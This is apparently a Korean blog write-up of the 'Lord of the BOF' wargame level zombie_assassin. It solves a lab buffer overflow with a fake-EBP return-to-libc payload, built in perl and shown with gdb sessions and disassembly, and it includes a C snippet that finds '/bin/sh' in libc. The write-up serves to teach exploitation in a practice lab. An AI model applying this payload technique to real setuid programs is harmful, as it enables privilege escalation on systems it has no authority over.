반응형

오마이갓 fake ebp.. you are like twins with fpo omg why


참고한 자료들:

http://sangu1ne.tistory.com/9 <<-여기 Sanguine형 블러그 여기 롸잇업 짱임여! 롸잇업 뿐만아니라 그냥 짱짱

http://1tchy.tistory.com/entry/fake-ebp <<-간지해커 잇치형의 블러그! 여기 역시 롸잇업 짱임!

이런분들 사이에 끼어 살다니 영광이빈다..

&&... cd80 ㅎ ㄳㄳ

검색기록 날리고 고정된 탭들역시 다 날아가서.. 후.. 더 올릴 수는 없지만 크롬 제발 최근 탭 이거 좀 늘려줬으면 좋겠네요..


[assassin@localhost assassin]$ ls

zombie_assassin  zombie_assassin.c

[assassin@localhost assassin]$ cat zombie_assassin.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - zombie_assassin

        - FEBP

*/


#include <stdio.h>

#include <stdlib.h>


main(int argc, char *argv[])

{

        char buffer[40];


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        if(argv[1][47] == '\xbf')

        {

                printf("stack retbayed you!\n");

                exit(0);

        }


        if(argv[1][47] == '\x40')

        {

                printf("library retbayed you, too!!\n");

                exit(0);

        }


        // strncpy instead of strcpy!

        strncpy(buffer, argv[1], 48);

        printf("%s\n", buffer);

}


[assassin@localhost assassin]$ cp zombie_assassin newbie_assassin

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print  "\x90"x48'`



Segmentation fault (core dumped)

[assassin@localhost assassin]$ gdb -q newbie_assassin core

Core was generated by `./newbie_assassin '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0x90909090 in ?? ()

(gdb) x/40wx $esp-40

0xbffffab8:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffac8:     0x90909090      0x90909090      0x90909090      0x90909090 //훼이크(?)

0xbffffad8:     0x90909090      0x90909090      0x00000002      0xbffffb24

0xbffffae8:     0xbffffb30      0x40013868      0x00000002      0x08048390

0xbffffaf8:     0x00000000      0x080483b1      0x08048440      0x00000002

0xbffffb08:     0xbffffb24      0x080482e4      0x0804851c      0x4000ae60

0xbffffb18:     0xbffffb1c      0x40013e90      0x00000002      0xbffffc16

0xbffffb28:     0xbffffc28      0x00000000      0xbffffc59      0xbffffc6c

0xbffffb38:     0xbffffc84      0xbffffca3      0xbffffcc5      0xbffffcd3

0xbffffb48:     0xbffffe96      0xbffffeb5      0xbffffed3      0xbffffee8

(gdb) x/40wx $esp-80

0xbffffa90:     0x40106980      0x0804857e      0xbffffab0      0x401081ec

0xbffffaa0:     0xbffffad8      0x080484dc      0x0804857e      0xbffffab0

0xbffffab0:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffac0:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffad0:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffae0:     0x00000002      0xbffffb24      0xbffffb30      0x40013868

0xbffffaf0:     0x00000002      0x08048390      0x00000000      0x080483b1

0xbffffb00:     0x08048440      0x00000002      0xbffffb24      0x080482e4

0xbffffb10:     0x0804851c      0x4000ae60      0xbffffb1c      0x40013e90

0xbffffb20:     0x00000002      0xbffffc16      0xbffffc28      0x00000000

(gdb) q

[assassin@localhost assassin]$ payload= buffer[dummy][system addr][dummy][binsh][leftover nop] sfp[buffer addr] ret[leaveret]

bash2: buffer[system: command not found


[assassin@localhost assassin]$ gdb -q newbie_assassin core

Core was generated by `./newbie_assassin '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0x90909090 in ?? ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

(gdb) q

[assassin@localhost assassin]$ clear


[assassin@localhost assassin]$ gdb -q newbie_assassin core

Core was generated by `./newbie_assassin '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0x90909090 in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048446

(gdb) r

Starting program: /home/assassin/newbie_assassin


Breakpoint 1, 0x8048446 in main ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

(gdb) disas main

Dump of assembler code for function main:

0x8048440 <main>:       push   %ebp

0x8048441 <main+1>:     mov    %esp,%ebp

0x8048443 <main+3>:     sub    $0x28,%esp

0x8048446 <main+6>:     cmpl   $0x1,0x8(%ebp)

0x804844a <main+10>:    jg     0x8048463 <main+35>

0x804844c <main+12>:    push   $0x8048540

0x8048451 <main+17>:    call   0x8048354 <printf>

0x8048456 <main+22>:    add    $0x4,%esp

0x8048459 <main+25>:    push   $0x0

0x804845b <main+27>:    call   0x8048364 <exit>

0x8048460 <main+32>:    add    $0x4,%esp

0x8048463 <main+35>:    mov    0xc(%ebp),%eax

0x8048466 <main+38>:    add    $0x4,%eax

0x8048469 <main+41>:    mov    (%eax),%edx

0x804846b <main+43>:    add    $0x2f,%edx

0x804846e <main+46>:    cmpb   $0xbf,(%edx)

0x8048471 <main+49>:    jne    0x8048490 <main+80>

0x8048473 <main+51>:    push   $0x804854c

0x8048478 <main+56>:    call   0x8048354 <printf>

0x804847d <main+61>:    add    $0x4,%esp

0x8048480 <main+64>:    push   $0x0

0x8048482 <main+66>:    call   0x8048364 <exit>

0x8048487 <main+71>:    add    $0x4,%esp

0x804848a <main+74>:    lea    0x0(%esi),%esi

0x8048490 <main+80>:    mov    0xc(%ebp),%eax

0x8048493 <main+83>:    add    $0x4,%eax

0x8048496 <main+86>:    mov    (%eax),%edx

0x8048498 <main+88>:    add    $0x2f,%edx

0x804849b <main+91>:    cmpb   $0x40,(%edx)

0x804849e <main+94>:    jne    0x80484b7 <main+119>

0x80484a0 <main+96>:    push   $0x8048561

0x80484a5 <main+101>:   call   0x8048354 <printf>

0x80484aa <main+106>:   add    $0x4,%esp

0x80484ad <main+109>:   push   $0x0

0x80484af <main+111>:   call   0x8048364 <exit>

0x80484b4 <main+116>:   add    $0x4,%esp

---Type <return> to continue, or q <return> to quit---

0x80484b7 <main+119>:   push   $0x30

0x80484b9 <main+121>:   mov    0xc(%ebp),%eax

0x80484bc <main+124>:   add    $0x4,%eax

0x80484bf <main+127>:   mov    (%eax),%edx

0x80484c1 <main+129>:   push   %edx

0x80484c2 <main+130>:   lea    0xffffffd8(%ebp),%eax

0x80484c5 <main+133>:   push   %eax

0x80484c6 <main+134>:   call   0x8048374 <strncpy>

0x80484cb <main+139>:   add    $0xc,%esp

0x80484ce <main+142>:   lea    0xffffffd8(%ebp),%eax

0x80484d1 <main+145>:   push   %eax

0x80484d2 <main+146>:   push   $0x804857e

0x80484d7 <main+151>:   call   0x8048354 <printf>

0x80484dc <main+156>:   add    $0x8,%esp

0x80484df <main+159>:   leave

0x80484e0 <main+160>:   ret


End of assembler dump.


[assassin@localhost assassin]$ bash2

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@°ú ¿߄

bash$

bash$ exit

exit

Segmentation fault (core dumped)

[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@°ú ¿߄

bash$ my-pass

euid = 516

근데 이상한거 하나 잘못하다가 bash2 무작정 많이 돌려놨거든여 그래서 ps하면 bash2가 3개정도 돌아가고있어쓴ㄴ데 그러면 공격이 안되더라고여 (다른 세션으로 했는데 공격되는데 막 내가쓰는건 안댐)그래서 다 bash까지 exit하고서 다시 bash2하니까 되네요 왜그럼

그리고 예전에 libc에서 /bin/sh문자열 찾는 소스 구해서 여따가 썼는데.. 사이트 아마 저장해뒀을테니까 찾아볼께요 이번에 다시 완전히 처음부터 해보려고 소스던 로그던 다날려서 못찾음..ㄸㄹㄹ

그나저나 하.. 어렵다! 두단계남았다! 배고프다! 2시다!!! 으랴


+)로그 안날아갔다고 합니다 똑똑한 토끼를 칭찬해주세여 하지만 또 올릴 필요는 없으니 /bin/sh찾는 소스만 올리겠습니다

-해당 소스-

[assassin@localhost assassin]$ cat foo.c

main(){

        char *p;


        p = 0x4002c000;

        while (1) {

                while (*p++ != '/') ;

                if (strcmp(p-1, "/bin/sh") == 0) {

                        printf("0x%08x\n", p-1);

                        return 0;

                }

        }

}

출처는 <http://www.win.tue.nl/~aeb/linux/hh/hh-10.html>여기서 찾았습니다.

반응형

'STUDY > Lord of the BOF' 카테고리의 다른 글

succubus->nightmare  (0) 2014.07.10
zombie_assassin->succubus  (0) 2014.07.08
assassin->zombie_assassin  (0) 2014.05.13
giant->assassin  (0) 2014.04.22
bugbear->giant(1)  (0) 2014.04.16

+ Recent posts